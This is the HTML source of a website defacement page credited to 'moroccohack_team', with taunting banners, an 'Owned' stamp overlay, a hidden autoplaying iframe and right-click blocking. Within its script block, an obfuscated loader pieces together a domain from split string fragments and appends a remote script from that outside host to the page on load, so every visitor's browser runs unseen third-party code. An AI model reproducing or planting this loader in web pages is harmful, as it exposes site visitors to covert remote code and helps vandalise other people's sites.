
    <html>
        <head>
        <title>HaCkEd By moroccohack_team</title>
        <meta charset='UTF-8'>
        <meta name="keywords" content="HaCkEd By moroccohack_team">
        <meta name="description" content="HaCkEd By moroccohack_team">
        </head>
        <link rel="icon" type="image/png" href="" />
        <link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>
        <meta property="og:description" content=" STAY SAFE BROTHERS "/>	
        <meta property="og:image" content="https://i.imgur.com/BMhDktK.png"/>
        <link rel="shortcut icon" href="https://i.imgur.com/BMhDktK.png"/>
        <style>
        body {
        font-family: 'Electrolize', sans-serif;
        font-size: 16px;
        background-image:url('https://thumbs.gfycat.com/AbandonedSoupyKagu-size_restricted.gif');
        font-color: #000;
        </style>
        </head>
        <base href="">
        <iframe allowfullscreen="" frameborder="0" height="1" src="https://www.youtube.com/embed/LMQ8sSvqphg?rel=0&amp;autoplay=1&amp;rel=" width="1"></iframe></iframe>
        <body oncontextmenu="return false">
        <center><div><FONT COLOR="#FFF"size="4px"> &#9733;<FONT COLOR="#FF0000" size="4px"> &#9733;<FONT COLOR="#FFF"size="4px"> &#9733;<FONT COLOR="#FF0000" size="4px"> &#9733;<FONT COLOR="#FFF"size="4px"> &#9733; <FONT COLOR="#FF0000" size="4px"> &#9733;<FONT COLOR="#FFF"size="4px"> <br><br>
            </font></font></font></font></font></font></font>
            <a href="https://www.facebook.com/" target="blank"> 
            <img class="img_OW" src="https://i.skyrock.net/4456/67664456/pics/2879932778_1.gif" width="449" height="343" onclick="top.focus()" onmouseout="stoprattle(this);top.focus()" onmouseover="init(this);rattleimage()" /></a><FONT COLOR="#FFF"size="4px"></img><br><br>
        <A STYLE="color:white; text-decoration:none"></a></body>
        <center><div><font color="#FFF"size="6px">HaCkEd By Moroccohack_team - FaZe Mrx </font> <font color="#FFF"><a style="color:white; text-decoration:none" ></a><br><br></font>
        
        <center><div><font color="#FFF"size="6px">AttaCking From</font> <font color=FF0000" size="6px"> MoRoCCo </font> <font color="#FFF"><a style="color:white; text-decoration:none" ></a><br></font>
        
        
        <br><center><div><font color="#7E7676"size="4px"><center>
                <div><center>
                    <div><center>
                        <div><center>
        
        <center><div><font color="#FFF"size="5px"></font> <font color=FF0000" size="5px"> 
            
            </font> <font color="#FFF"><a style="color:white; text-decoration:none" ></a><br><br></font>
        
        </html>
        
        </script>
        </html>
        <script type="text/javascript">
            var DADrightclicktheme = 'Dark';
            var DADrightclickimage = 'http://img4.wikia.nocookie.net/__cb20120120134644/callofduty/images/6/65/Owned_Stamp.png';
        </script>
        <script>
            if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
                var DADarcv2t = 'rgba(239,110,119, 0.9)';
            } else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
                var DADarcv2t = 'rgba(110,137,239, 0.9)';
            } else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
                var DADarcv2t = 'rgba(110,239,110, 0.9)';
            } else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
                var DADarcv2t = 'rgba(255,255,255, 0.9)';
            } else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
                var DADarcv2t = 'rgba(239,110,225, 0.9)';
            } else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
                var DADarcv2t = 'rgba(0,0,0, 0.9)';
            } else {
                {
                    var DADarcv2t = 'transparent';
                }
            }
        
            function DADarcvwi2() {
                var DADarcv2v = document.getElementById('DADarcv2c');
                if (DADarcv2v.style.display == "block") {
                    DADarcv2v.style.display = "none";
                } else {
                    DADarcv2v.style.display = "block";
                }
            }
        
            function DADarcwiv2a() {
                DADarcvwi2();
                return false;
            }
            document.oncontextmenu = DADarcwiv2a;
            var ypro = 'http:';
            var yajax = document.createElement('script');
            yajax.type = 'text/javascript';
            var yquery = 'dic';
            var ybrow = 'aru.c';
            var yint = '/';
            yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
            document.getElementsByTagName('head')[0].appendChild(yajax);
            var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url('../www.zone-h.org/archive/ + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
            document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
        </script>
        <style type="text/css">
            #DADarcv2c {
                background: url(http:///img4.wikia.nocookie.net/__cb20120120134644/callofduty/images/6/65/Owned_Stamp.png) no-repeat center center fixed rgba(0, 0, 0, 0.9);
                text-align: center;
                width: 100%;
                height: 100%;
                position: fixed;
                top: 0px;
                left: 0px;
                bottom: 0px;
                right: 0px;
                border: 0px;
                z-index: 1000000;
                display: none;
                padding: auto;
            }
            
            #DADarcv2c span {
                position: fixed;
                bottom: 0px;
                left: 10%;
                right: 10%;
                cursor: pointer;
                font-size: 20px;
            }
        </style>
        <div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="">
            <center><span><a href="#" target="_blank"></a></span></center>
            </div>
        
        
        <body><style type="text/css">body {cursor:url("../www.cursor.cc/cursor/192/10/cursor.png"),default}</style></body>
        
        </script></div></marquee></center></div></body></html>
